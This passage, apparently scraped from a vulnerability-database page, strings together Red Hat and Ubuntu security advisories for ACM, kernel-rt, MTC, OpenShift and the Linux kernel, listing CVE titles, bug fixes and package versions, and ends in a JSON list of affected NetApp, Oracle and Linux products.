Uninstall pod crashed when destroying Azure Gov cluster in ACM (BZ# 2073562)
-
Deprovisioned clusters not filtered out by discovery controller (BZ# 2075594)
-
When deleting a secret for a Helm application, duplicate errors show up in topology (BZ# 2075675)
-
Changing existing placement rules does not change YAML file Regression (BZ# 2075724)
-
Editing Helm Argo Applications does not Prune Old Resources (BZ# 2079906)
-
Failed to delete the requested resource [404] error appears after subscription is deleted and its placement rule is used in the second subscription (BZ# 2080713)
-
Typo in the logs when Deployable is updated in the subscription namespace (BZ# 2080960)
-
After Argo App Sets are created in an Upgraded Environment, the Clusters column does not indicate the clusters (BZ# 2080716)
-
RHACM 2.4.5 images (BZ# 2081438)
-
Performance issue to get secret in claim-controller (BZ# 2081908)
-
Failed to provision openshift 4.10 on bare metal (BZ# 2094109)
-
Bugs fixed (https://bugzilla.redhat.com/):
1937078 - Trying to create a new cluster on vSphere and no feedback, stuck in "creating" 2030787 - CVE-2021-43565 golang.org/x/crypto: empty plaintext packet causes panic 2051752 - Wrong message is displayed when GRC fails to connect to an ansible tower 2052573 - CVE-2022-24450 nats-server: misusing the "dynamically provisioned sandbox accounts" feature authenticated user can obtain the privileges of the System account 2052702 - multicluster_operators_hub_subscription issues due to /tmp usage 2053429 - CVE-2022-23806 golang: crypto/elliptic IsOnCurve returns true for invalid field elements 2054954 - Create Cluster, Worker Pool 2 zones do not load options that relate to the selected Region field 2059822 - Changing the multiclusterhub name other than the default name keeps the version in the web console loading. 2065318 - search-redisgraph-0 generating massive amount of logs after 2.4.2 upgrade 2072009 - CVE-2022-24785 Moment.js: Path traversal in moment.locale 2073562 - Uninstall pod crashed when destroying Azure Gov cluster in ACM 2074689 - CVE-2022-21803 nconf: Prototype pollution in memory store 2075594 - Deprovisioned clusters not filtered out by discovery controller 2075675 - When deleting a secret for a Helm application, duplicate errors show up in topology 2075724 - Changing existing placement rules does not change YAML file 2079906 - Editing Helm Argo Applications does not Prune Old Resources 2080279 - CVE-2022-29810 go-getter: writes SSH credentials into logfile, exposing sensitive credentials to local uses 2080713 - Failed to delete the requested resource [404] error appears after subscription is deleted and it's placement rule is used in the second subscription [Upgrade] 2080716 - After Argo App Sets are created in an Upgraded Environment, the Clusters column does not indicate the clusters 2080847 - CVE-2022-25645 dset: Prototype Pollution in dset 2080960 - Typo in the logs when Deployable is updated in the subscription namespace 2081438 - RHACM 2.4.5 images 2081908 - Performance issue to get secret in claim-controller 2084085 - CVE-2022-29526 golang: syscall: faccessat checks wrong group 2094109 - Failed to provision openshift 4.10 on bare metal
- See the following Release Notes documentation, which will be updated shortly for this release, for additional details about this release:
https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.3/html/release_notes/
Security fixes:
-
node-fetch: exposure of sensitive information to an unauthorized actor (CVE-2022-0235)
-
follow-redirects: Exposure of Sensitive Information via Authorization Header leak (CVE-2022-0536)
-
nconf: Prototype pollution in memory store (CVE-2022-21803)
-
golang: crypto/elliptic IsOnCurve returns true for invalid field elements (CVE-2022-23806)
-
Moment.js: Path traversal in moment.locale (CVE-2022-24785)
-
golang: syscall: faccessat checks wrong group (CVE-2022-29526)
-
go-getter: writes SSH credentials into logfile, exposing sensitive credentials to local uses (CVE-2022-29810)
Bug fixes:
-
RHACM 2.3.11 images (BZ# 2082087)
-
Bugs fixed (https://bugzilla.redhat.com/):
2044591 - CVE-2022-0235 node-fetch: exposure of sensitive information to an unauthorized actor 2053259 - CVE-2022-0536 follow-redirects: Exposure of Sensitive Information via Authorization Header leak 2053429 - CVE-2022-23806 golang: crypto/elliptic IsOnCurve returns true for invalid field elements 2072009 - CVE-2022-24785 Moment.js: Path traversal in moment.locale 2074689 - CVE-2022-21803 nconf: Prototype pollution in memory store 2080279 - CVE-2022-29810 go-getter: writes SSH credentials into logfile, exposing sensitive credentials to local uses 2082087 - RHACM 2.3.11 images 2084085 - CVE-2022-29526 golang: syscall: faccessat checks wrong group
- -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
===================================================================== Red Hat Security Advisory
Synopsis: Important: kernel-rt security and bug fix update Advisory ID: RHSA-2022:1975-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2022:1975 Issue date: 2022-05-10 CVE Names: CVE-2020-0404 CVE-2020-13974 CVE-2020-27820 CVE-2021-0941 CVE-2021-3612 CVE-2021-3669 CVE-2021-3743 CVE-2021-3744 CVE-2021-3752 CVE-2021-3759 CVE-2021-3764 CVE-2021-3772 CVE-2021-3773 CVE-2021-4002 CVE-2021-4037 CVE-2021-4083 CVE-2021-4157 CVE-2021-4197 CVE-2021-4203 CVE-2021-20322 CVE-2021-26401 CVE-2021-29154 CVE-2021-37159 CVE-2021-41864 CVE-2021-42739 CVE-2021-43389 CVE-2021-43976 CVE-2021-44733 CVE-2021-45485 CVE-2021-45486 CVE-2022-0001 CVE-2022-0002 CVE-2022-0286 CVE-2022-0322 CVE-2022-1011 =====================================================================
- Summary:
An update for kernel-rt is now available for Red Hat Enterprise Linux 8.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Real Time (v. 8) - x86_64 Red Hat Enterprise Linux Real Time for NFV (v. 8) - x86_64
- Description:
The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.
Security Fix(es):
-
kernel: fget: check that the fd still exists after getting a ref to it (CVE-2021-4083)
-
kernel: avoid cyclic entity chains due to malformed USB descriptors (CVE-2020-0404)
-
kernel: integer overflow in k_ascii() in drivers/tty/vt/keyboard.c (CVE-2020-13974)
-
kernel: out-of-bounds read in bpf_skb_change_head() of filter.c due to a use-after-free (CVE-2021-0941)
-
kernel: joydev: zero size passed to joydev_handle_JSIOCSBTNMAP() (CVE-2021-3612)
-
kernel: reading /proc/sysvipc/shm does not scale with large shared memory segment counts (CVE-2021-3669)
-
kernel: out-of-bound Read in qrtr_endpoint_post in net/qrtr/qrtr.c (CVE-2021-3743)
-
kernel: crypto: ccp - fix resource leaks in ccp_run_aes_gcm_cmd() (CVE-2021-3744)
-
kernel: possible use-after-free in bluetooth module (CVE-2021-3752)
-
kernel: unaccounted ipc objects in Linux kernel lead to breaking memcg limits and DoS attacks (CVE-2021-3759)
-
kernel: DoS in ccp_run_aes_gcm_cmd() function (CVE-2021-3764)
-
kernel: sctp: Invalid chunks may be used to remotely remove existing associations (CVE-2021-3772)
-
kernel: lack of port sanity checking in natd and netfilter leads to exploit of OpenVPN clients (CVE-2021-3773)
-
kernel: possible leak or coruption of data residing on hugetlbfs (CVE-2021-4002)
-
kernel: security regression for CVE-2018-13405 (CVE-2021-4037)
-
kernel: Buffer overwrite in decode_nfs_fh function (CVE-2021-4157)
-
kernel: cgroup: Use open-time creds and namespace for migration perm checks (CVE-2021-4197)
-
kernel: Race condition in races in sk_peer_pid and sk_peer_cred accesses (CVE-2021-4203)
-
kernel: new DNS Cache Poisoning Attack based on ICMP fragment needed packets replies (CVE-2021-20322)
-
hw: cpu: LFENCE/JMP Mitigation Update for CVE-2017-5715 (CVE-2021-26401)
-
kernel: Local privilege escalation due to incorrect BPF JIT branch displacement computation (CVE-2021-29154)
-
kernel: use-after-free in hso_free_net_device() in drivers/net/usb/hso.c (CVE-2021-37159)
-
kernel: eBPF multiplication integer overflow in prealloc_elems_and_freelist() in kernel/bpf/stackmap.c leads to out-of-bounds write (CVE-2021-41864)
-
kernel: Heap buffer overflow in firedtv driver (CVE-2021-42739)
-
kernel: an array-index-out-bounds in detach_capi_ctr in drivers/isdn/capi/kcapi.c (CVE-2021-43389)
-
kernel: mwifiex_usb_recv() in drivers/net/wireless/marvell/mwifiex/usb.c allows an attacker to cause DoS via crafted USB device (CVE-2021-43976)
-
kernel: use-after-free in the TEE subsystem (CVE-2021-44733)
-
kernel: information leak in the IPv6 implementation (CVE-2021-45485)
-
kernel: information leak in the IPv4 implementation (CVE-2021-45486)
-
hw: cpu: intel: Branch History Injection (BHI) (CVE-2022-0001)
-
hw: cpu: intel: Intra-Mode BTI (CVE-2022-0002)
-
kernel: Local denial of service in bond_ipsec_add_sa (CVE-2022-0286)
-
kernel: DoS in sctp_addto_chunk in net/sctp/sm_make_chunk.c (CVE-2022-0322)
-
kernel: FUSE allows UAF reads of write() buffers, allowing theft of (partial) /etc/shadow hashes (CVE-2022-1011)
-
kernel: use-after-free in nouveau kernel module (CVE-2020-27820)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Additional Changes:
For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.6 Release Notes linked from the References section.
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
The system must be rebooted for this update to take effect.
- Bugs fixed (https://bugzilla.redhat.com/):
1901726 - CVE-2020-27820 kernel: use-after-free in nouveau kernel module 1903578 - kernnel-rt-debug: do not call blocking ops when !TASK_RUNNING; state=1 set at [<0000000050e86018>] handle_userfault+0x530/0x1820 1905749 - kernel-rt-debug: BUG: sleeping function called from invalid context at kernel/locking/rtmutex.c:968 1919791 - CVE-2020-0404 kernel: avoid cyclic entity chains due to malformed USB descriptors 1946684 - CVE-2021-29154 kernel: Local privilege escalation due to incorrect BPF JIT branch displacement computation 1951739 - CVE-2021-42739 kernel: Heap buffer overflow in firedtv driver 1974079 - CVE-2021-3612 kernel: joydev: zero size passed to joydev_handle_JSIOCSBTNMAP() 1985353 - CVE-2021-37159 kernel: use-after-free in hso_free_net_device() in drivers/net/usb/hso.c 1986473 - CVE-2021-3669 kernel: reading /proc/sysvipc/shm does not scale with large shared memory segment counts 1997467 - CVE-2021-3764 kernel: DoS in ccp_run_aes_gcm_cmd() function 1997961 - CVE-2021-3743 kernel: out-of-bound Read in qrtr_endpoint_post in net/qrtr/qrtr.c 1999544 - CVE-2021-3752 kernel: possible use-after-free in bluetooth module 1999675 - CVE-2021-3759 kernel: unaccounted ipc objects in Linux kernel lead to breaking memcg limits and DoS attacks 2000627 - CVE-2021-3744 kernel: crypto: ccp - fix resource leaks in ccp_run_aes_gcm_cmd() 2000694 - CVE-2021-3772 kernel: sctp: Invalid chunks may be used to remotely remove existing associations 2004949 - CVE-2021-3773 kernel: lack of port sanity checking in natd and netfilter leads to exploit of OpenVPN clients 2010463 - CVE-2021-41864 kernel: eBPF multiplication integer overflow in prealloc_elems_and_freelist() in kernel/bpf/stackmap.c leads to out-of-bounds write 2013180 - CVE-2021-43389 kernel: an array-index-out-bounds in detach_capi_ctr in drivers/isdn/capi/kcapi.c 2014230 - CVE-2021-20322 kernel: new DNS Cache Poisoning Attack based on ICMP fragment needed packets replies 2016169 - CVE-2020-13974 kernel: integer overflow in k_ascii() in drivers/tty/vt/keyboard.c 2018205 - CVE-2021-0941 kernel: out-of-bounds read in bpf_skb_change_head() of filter.c due to a use-after-free 2025003 - CVE-2021-43976 kernel: mwifiex_usb_recv() in drivers/net/wireless/marvell/mwifiex/usb.c allows an attacker to cause DoS via crafted USB device 2025726 - CVE-2021-4002 kernel: possible leak or coruption of data residing on hugetlbfs 2027239 - CVE-2021-4037 kernel: security regression for CVE-2018-13405 2029923 - CVE-2021-4083 kernel: fget: check that the fd still exists after getting a ref to it 2030747 - CVE-2021-44733 kernel: use-after-free in the TEE subsystem 2034342 - CVE-2021-4157 kernel: Buffer overwrite in decode_nfs_fh function 2035652 - CVE-2021-4197 kernel: cgroup: Use open-time creds and namespace for migration perm checks 2036934 - CVE-2021-4203 kernel: Race condition in races in sk_peer_pid and sk_peer_cred accesses 2037019 - CVE-2022-0286 kernel: Local denial of service in bond_ipsec_add_sa 2039911 - CVE-2021-45485 kernel: information leak in the IPv6 implementation 2039914 - CVE-2021-45486 kernel: information leak in the IPv4 implementation 2042822 - CVE-2022-0322 kernel: DoS in sctp_addto_chunk in net/sctp/sm_make_chunk.c 2061700 - CVE-2021-26401 hw: cpu: LFENCE/JMP Mitigation Update for CVE-2017-5715 2061712 - CVE-2022-0001 hw: cpu: intel: Branch History Injection (BHI) 2061721 - CVE-2022-0002 hw: cpu: intel: Intra-Mode BTI 2064855 - CVE-2022-1011 kernel: FUSE allows UAF reads of write() buffers, allowing theft of (partial) /etc/shadow hashes
- Package List:
Red Hat Enterprise Linux Real Time for NFV (v. 8):
Source: kernel-rt-4.18.0-372.9.1.rt7.166.el8.src.rpm
x86_64: kernel-rt-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm kernel-rt-core-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm kernel-rt-debug-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm kernel-rt-debug-core-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm kernel-rt-debug-debuginfo-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm kernel-rt-debug-devel-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm kernel-rt-debug-kvm-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm kernel-rt-debug-modules-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm kernel-rt-debug-modules-extra-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm kernel-rt-debuginfo-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm kernel-rt-debuginfo-common-x86_64-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm kernel-rt-devel-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm kernel-rt-kvm-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm kernel-rt-modules-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm kernel-rt-modules-extra-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm
Red Hat Enterprise Linux Real Time (v. 8):
Source: kernel-rt-4.18.0-372.9.1.rt7.166.el8.src.rpm
x86_64: kernel-rt-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm kernel-rt-core-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm kernel-rt-debug-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm kernel-rt-debug-core-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm kernel-rt-debug-debuginfo-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm kernel-rt-debug-devel-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm kernel-rt-debug-modules-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm kernel-rt-debug-modules-extra-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm kernel-rt-debuginfo-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm kernel-rt-debuginfo-common-x86_64-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm kernel-rt-devel-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm kernel-rt-modules-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm kernel-rt-modules-extra-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2022 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQIVAwUBYnqRVtzjgjWX9erEAQjwiA//R/ZVJ7xroUR7Uf1az+8xZqs4OZQADIUc /92cDd6MRyzkvwQx5u7JmD5E6KbRf3NGfDsuoC0jVJJJcp8GT0tWkxPIjCi2RNbI /9nlbkfp0eQqRGmpL753W/7sfzAnbiOeP47rr+lJU24OBDcbrZn5X3Ex0EdzcdeD fmVnAxB8bsXyZwcnX9m6mVlBxY+fm6SC78O+/rPzVUHl5NhQASqi0sYSwydyqZvG a/9p5gXd9nnyV7NtJj58pS7brxQFq4RcM5VhTjix3a/ZaZEwT+nDMj3+RXXwUhGe HJ6AdJoNI19huMXtn/fYhomb/LIHQos+kHQrBbJ+KmaFE4DD08Uv2uHSyeEe1ksT oUwcGcIbSta6LBNO60Lh0XVj6FgFWNnNsAGX27nxCHfzDjuJ3U4Tyh8gL+ID2K1t 3nwoQl5gxUokFS0sUIuD0pj2LFW1vg2E2pMcbzPDqFwj0MXn5DpTb4qeuiRWzA05 s+upi3Cd6XmRNKPH8DDOrGNGW0dJqJtuXhUmziZjKPMJK5Ygnhoc+3hYG/EJzGiq S/VHXR5hnJ+RAPz2U8rETfCW2Dvz7lCUh5rJGg/8f8MCyAMCPpFqXbkNvpt3BIKy 2SLBhh0Mci1fprA35q2eNCjduntja3oxnVx+YAKPM30hzE7ejwHFEZHPGOdKB0q/ aHIZwOKDLaE= =hqV1 -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . Summary:
The Migration Toolkit for Containers (MTC) 1.6.5 is now available. Description:
The Migration Toolkit for Containers (MTC) enables you to migrate Kubernetes resources, persistent volume data, and internal container images between OpenShift Container Platform clusters, using the MTC web console or the Kubernetes API. Bugs fixed (https://bugzilla.redhat.com/):
2006044 - CVE-2021-39293 golang: archive/zip: malformed archive may cause panic or memory exhaustion (incomplete fix of CVE-2021-33196) 2007557 - CVE-2021-3807 nodejs-ansi-regex: Regular expression denial of service (ReDoS) matching ANSI escape codes 2057579 - [MTC UI] Cancel button on ?Migrations? page does not disappear when migration gets Failed/Succeeded with warnings 2072311 - HPAs of DeploymentConfigs are not being updated when migration from Openshift 3.x to Openshift 4.x 2074044 - [MTC] Rsync pods are not running as privileged 2074553 - Upstream Hook Runner image requires arguments be in a different order
- Description:
Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.
This advisory contains the container images for Red Hat OpenShift Container Platform 4.10.39. See the following advisory for the RPM packages for this release:
https://access.redhat.com/errata/RHBA-2022:7210
Space precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes:
https://docs.openshift.com/container-platform/4.10/release_notes/ocp-4-10-release-notes.html
Security Fix(es):
- go-getter: command injection vulnerability (CVE-2022-26945)
- go-getter: unsafe download (issue 1 of 3) (CVE-2022-30321)
- go-getter: unsafe download (issue 2 of 3) (CVE-2022-30322)
- go-getter: unsafe download (issue 3 of 3) (CVE-2022-30323)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
You may download the oc tool and use it to inspect release image metadata as follows:
(For x86_64 architecture)
$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.10.39-x86_64
The image digest is sha256:59d7ac85da072fea542d7c43498e764c72933e306117a105eac7bd5dda4e6bbe
(For s390x architecture)
$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.10.39-s390x
The image digest is sha256:6b243bd6078b0a0e570c7bdf88a345f0c145009f929844f4c8ceb4dc828c0a7a
(For ppc64le architecture)
$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.10.39-ppc64le
The image digest is sha256:e28554de454e8955fe72cd124fa9893e2c1761d39452e05610ec062d637baf2e
(For aarch64 architecture)
$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.10.39-aarch64
The image digest is sha256:cc0860b33c3631ee3624cc280d796fb01ce8f802c5d7ecde8ef4010aad941dc0
All OpenShift Container Platform 4.10 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift Console or the CLI oc command. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.10/updating/updating-cluster-cli.html
- Solution:
For OpenShift Container Platform 4.10 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this asynchronous errata update:
https://docs.openshift.com/container-platform/4.10/release_notes/ocp-4-10-release-notes.html
Details on how to access this content are available at https://docs.openshift.com/container-platform/4.10/updating/updating-cluster-cli.html
- Bugs fixed (https://bugzilla.redhat.com/):
2092918 - CVE-2022-30321 go-getter: unsafe download (issue 1 of 3) 2092923 - CVE-2022-30322 go-getter: unsafe download (issue 2 of 3) 2092925 - CVE-2022-30323 go-getter: unsafe download (issue 3 of 3) 2092928 - CVE-2022-26945 go-getter: command injection vulnerability
- JIRA issues fixed (https://issues.jboss.org/):
OCPBUGS-1538 - Make northd probe interval default to 10 seconds OCPBUGS-1696 - All Nodes overview in console are showing "Something went wrong" OCPBUGS-2162 - Facing issue while configuring egress IP pool in OCP cluster which uses STS OCPBUGS-2171 - [4.10] cri-o should report the stage of container and pod creation it's stuck at OCPBUGS-2196 - Symptom Detection.Undiagnosed panic detected in pod OCPBUGS-2208 - [4.10] Dual stack cluster fails on installation when multi-path routing entries exist OCPBUGS-2448 - Downward API (annotations) is missing PCI information when using the tuning metaPlugin on SR-IOV Networks OCPBUGS-2464 - Add unit-test and gofmt support for ovn-kubernetes OCPBUGS-2523 - e2e tests: Installs Red Hat Integration - 3scale operator test is failing due to change of Operator name OCPBUGS-2546 - Remove policy/v1beta1 in 4.10 and later OCPBUGS-2553 - [release-4.10] member loses rights after some other user login in openid / group sync OCPBUGS-2607 - [release-4.10] go.mod should beworking with golang-1.17 and golang-1.18 OCPBUGS-2622 - CI: Backend unit tests fails because devfile registry was updated (mock response) OCPBUGS-2628 - Worker creation fails within provider networks (as primary and secondary) OCPBUGS-450 - KubeDaemonSetRolloutStuck alert using incorrect metric in 4.9 and 4.10 OCPBUGS-691 - [2112237] [ Cluster storage Operator 4.x(10/11) ] DefaultStorageClassController report fake message "No default StorageClass for this platform" on Alicloud, IBM, Nutanix
- Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied. Bugs fixed (https://bugzilla.redhat.com/):
2094982 - CVE-2022-1996 go-restful: Authorization Bypass Through User-Controlled Key 2130218 - 4.9.7 containers
- ========================================================================== Ubuntu Security Notice USN-5299-1 February 22, 2022
linux, linux-aws, linux-kvm, linux-lts-xenial vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 16.04 ESM
- Ubuntu 14.04 ESM
Summary:
Several security issues were fixed in the Linux kernel. A physically proximate attacker could possibly use this issue to inject packets or exfiltrate selected fragments. (CVE-2020-26147)
It was discovered that the bluetooth subsystem in the Linux kernel did not properly perform access control. An authenticated attacker could possibly use this to expose sensitive information. (CVE-2020-26558, CVE-2021-0129)
It was discovered that the RPA PCI Hotplug driver implementation in the Linux kernel did not properly handle device name writes via sysfs, leading to a buffer overflow. A privileged attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-33034)
Norbert Slusarek discovered that the CAN broadcast manger (bcm) protocol implementation in the Linux kernel did not properly initialize memory in some situations. A local attacker could use this to expose sensitive information (kernel memory). (CVE-2021-34693)
马哲宇 discovered that the IEEE 1394 (Firewire) nosy packet sniffer driver in the Linux kernel did not properly perform reference counting in some situations, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-3483)
It was discovered that the bluetooth subsystem in the Linux kernel did not properly handle HCI device initialization failure, leading to a double-free vulnerability. An attacker could use this to cause a denial of service or possibly execute arbitrary code. (CVE-2021-3564)
Murray McAllister discovered that the joystick device interface in the Linux kernel did not properly validate data passed via an ioctl(). A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code on systems with a joystick device registered. (CVE-2021-3612)
It was discovered that the tracing subsystem in the Linux kernel did not properly keep track of per-cpu ring buffer state. A privileged attacker could use this to cause a denial of service. (CVE-2021-3679)
It was discovered that the MAX-3421 host USB device driver in the Linux kernel did not properly handle device removal events. A physically proximate attacker could use this to cause a denial of service (system crash). (CVE-2021-38204)
It was discovered that the 6pack network protocol driver in the Linux kernel did not properly perform validation checks. A privileged attacker could use this to cause a denial of service (system crash) or execute arbitrary code. (CVE-2021-42008)
Amit Klein discovered that the IPv6 implementation in the Linux kernel could disclose internal state in some situations. An attacker could possibly use this to expose sensitive information. (CVE-2021-45485)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 16.04 ESM: linux-image-4.4.0-1100-kvm 4.4.0-1100.109 linux-image-4.4.0-1135-aws 4.4.0-1135.149 linux-image-4.4.0-219-generic 4.4.0-219.252 linux-image-4.4.0-219-lowlatency 4.4.0-219.252 linux-image-aws 4.4.0.1135.140 linux-image-generic 4.4.0.219.226 linux-image-kvm 4.4.0.1100.98 linux-image-lowlatency 4.4.0.219.226 linux-image-virtual 4.4.0.219.226
Ubuntu 14.04 ESM: linux-image-4.4.0-1099-aws 4.4.0-1099.104 linux-image-4.4.0-219-generic 4.4.0-219.252~14.04.1 linux-image-4.4.0-219-lowlatency 4.4.0-219.252~14.04.1 linux-image-aws 4.4.0.1099.97 linux-image-generic-lts-xenial 4.4.0.219.190 linux-image-lowlatency-lts-xenial 4.4.0.219.190 linux-image-virtual-lts-xenial 4.4.0.219.190
After a standard system update you need to reboot your computer to make all the necessary changes.
ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well.
References: https://ubuntu.com/security/notices/USN-5299-1 CVE-2020-26147, CVE-2020-26558, CVE-2021-0129, CVE-2021-28972, CVE-2021-33034, CVE-2021-34693, CVE-2021-3483, CVE-2021-3564, CVE-2021-3612, CVE-2021-3679, CVE-2021-38204, CVE-2021-42008, CVE-2021-45485
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "h700s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "brocade fabric operating system",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "fabric-attached storage 8700",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "solidfire\\, enterprise sds \\\u0026 hci storage node",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h410c",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "aff a400",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "all flash fabric-attached storage 8300",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "fabric-attached storage a400",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "solidfire \\\u0026 hci management node",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h610c",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "e-series santricity os controller",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h615c",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "communications cloud native core network exposure function",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "22.1.1"
},
{
"_id": null,
"model": "communications cloud native core binding support function",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "22.1.3"
},
{
"_id": null,
"model": "h500e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "kernel",
"scope": "lt",
"trust": 1.0,
"vendor": "linux",
"version": "5.13.3"
},
{
"_id": null,
"model": "fabric-attached storage 8300",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "all flash fabric-attached storage 8700",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h300e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h300s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h610s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h500s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h700e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h410s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "hci compute node",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "communications cloud native core policy",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "22.2.0"
},
{
"_id": null,
"model": "e-series santricity os controller software",
"scope": null,
"trust": 0.8,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "hci baseboard management controller h300e",
"scope": null,
"trust": 0.8,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "kernel",
"scope": null,
"trust": 0.8,
"vendor": "linux",
"version": null
},
{
"_id": null,
"model": "fas/aff baseboard management controller a400",
"scope": null,
"trust": 0.8,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "fas/aff baseboard management controller 8700",
"scope": null,
"trust": 0.8,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "hci baseboard management controller h410c",
"scope": null,
"trust": 0.8,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "solidfire enterprise sds \u0026 hci storage node",
"scope": null,
"trust": 0.8,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "solidfire \u0026 hci management node",
"scope": null,
"trust": 0.8,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "hci baseboard management controller h300s",
"scope": null,
"trust": 0.8,
"vendor": "netapp",
"version": null
},
{
